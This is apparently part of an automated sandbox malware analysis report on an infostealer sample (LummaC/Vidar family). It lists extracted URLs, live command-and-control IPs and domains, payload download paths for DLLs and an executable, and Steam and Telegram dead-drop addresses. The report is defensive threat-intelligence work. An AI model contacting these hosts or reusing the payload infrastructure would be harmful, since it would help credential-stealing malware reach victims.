https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/badges	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.203.165.127/vcruntime140.dlln	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=83YueuslRxGq&l=e	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	JJDBGD.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cowod.hopto	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	false	Avira URL Cloud: safe	unknown
https://116.203.165.127/nss3.dllk	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/l	RegAsm.exe, 00000003.00000002.2429083892.0000000001460000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://t.me/ae5ed	file.exe, 00000000.00000002.1722743408.00000000035B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	RegAsm.exe, RegAsm.exe, 00000003.00000002.2467582948.000000006F8FD000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	RegAsm.exe, 00000003.00000002.2455404712.0000000040CCB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2440772422.0000000022FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2449261633.0000000034DEF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2443661390.0000000028F10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	false	URL Reputation: safe	unknown
http://cowod.hoptoDGCAAFB	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exe1kkkktoken	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.entrust.net/rpa03	file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FCAAAA.3.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.0000000001605000.00000004.00000020.00020000.00000000.sdmp, JJDBGD.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, DGDBAK.3.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	FCAAAA.3.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	DHCAAE.3.dr	false	URL Reputation: safe	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://116.203.165.127/vcruntime140.dll2	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=QI-9YLc_mdtk&l=en	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://116.203.165.127/softokn3.dll)	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://116.203.165.127/freebl3.dllI	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://cowod.multipart/form-data;	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeorm-data;	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	DGDBAK.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://www.entrust.net/rpa0	file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/about/	76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	DHCAAE.3.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.HJDBKJ	RegAsm.exe, 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	file.exe, BKKKEGIDBG.exe.3.dr, 66eef0ca0fb35_lfdsa[1].exe.3.dr	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/market/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FCAAAA.3.dr	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2434252843.000000001C54D000.00000004.00000020.00020000.00000000.sdmp, DGDBAK.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://147.45.44.104/prog/66eef0ca0fb35_lfdsa.exeh	RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/discussions/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/stats/	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2429083892.000000000148C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.9.6	appleboltelwk.shop	United States	13335	CLOUDFLARENETUS	true
92.122.104.90	steamcommunity.com	European Union	16625	AKAMAI-ASUS	true
116.203.165.127	unknown	Germany	24940	HETZNER-ASDE	true
172.67.203.61	tearrybyiwo.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	captainynfanw.shop	European Union	13335	CLOUDFLARENETUS	true
104.21.16.38	tendencerangej.shop	United States	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1515122
Start date and time:	2024-09-21 18:50:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/35@7/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 94 Number of non-executed functions: 197
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:51:35	API Interceptor	4x Sleep call for process: RegAsm.exe modified
12:52:29	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.9.6	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
92.122.104.90	AD3SI7tuzs.exe	Get hash	malicious	LummaC	Browse
	http://steamcommuninty.com/playtestinvite/deadlock	Get hash	malicious	Unknown	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	https://gtm.you1.cn/storesteam/app/835960?snr=2_9_100000_	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	1wM0OWBdv5.exe	Get hash	malicious	LummaC, CryptOne	Browse
	1wM0OWBdv5.exe	Get hash	malicious	LummaC, CryptOne	Browse
	https://lnky.ru/zhd70	Get hash	malicious	Unknown	Browse
116.203.165.127	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
172.67.203.61	file.exe	Get hash	malicious	LummaC, Vidar	Browse
172.67.203.61	https://greetmezwindderta.tk/_/WxlW1SN3/eFgUJo/?	Get hash	malicious	TechSupportScam	Browse
188.114.96.3	http://access-au.tm5on0acc7.free.hr/australian-mygov-RD1589-user-otp-detail-pic-tele/	Get hash	malicious	HTMLPhisher	Browse	access-au.tm5on0acc7.free.hr/cdn-cgi/challenge-platform/h/g/jsd/r/8c655bbf4f3d8c17
	uwUu.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.top99bet4d.site/cr12/?iP=ZqIMFormUukuT4eG1zHwCohh36jE5Zu62DMeVFRMgGNa/J5tRd6ltpELdyPT4A7cPL74&lN6h=VTIPdFG0GtZHE0U
	updater.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3
	custom_clearance_notification_20240918.exe	Get hash	malicious	FormBook	Browse	www.safaviehhome.shop/yof3/
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/iRfhkrSI/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/uqqJaZdf/download
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/iRfhkrSI/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/uqqJaZdf/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TX2daF45/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
appleboltelwk.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.9.6
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.9.6
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.140.206
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.9.6
tearrybyiwo.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.44.191
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.203.61
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	45.132.206.251
	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Get hash	malicious	Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer	Browse	45.132.206.251
	file.exe	Get hash	malicious	Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
captainynfanw.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
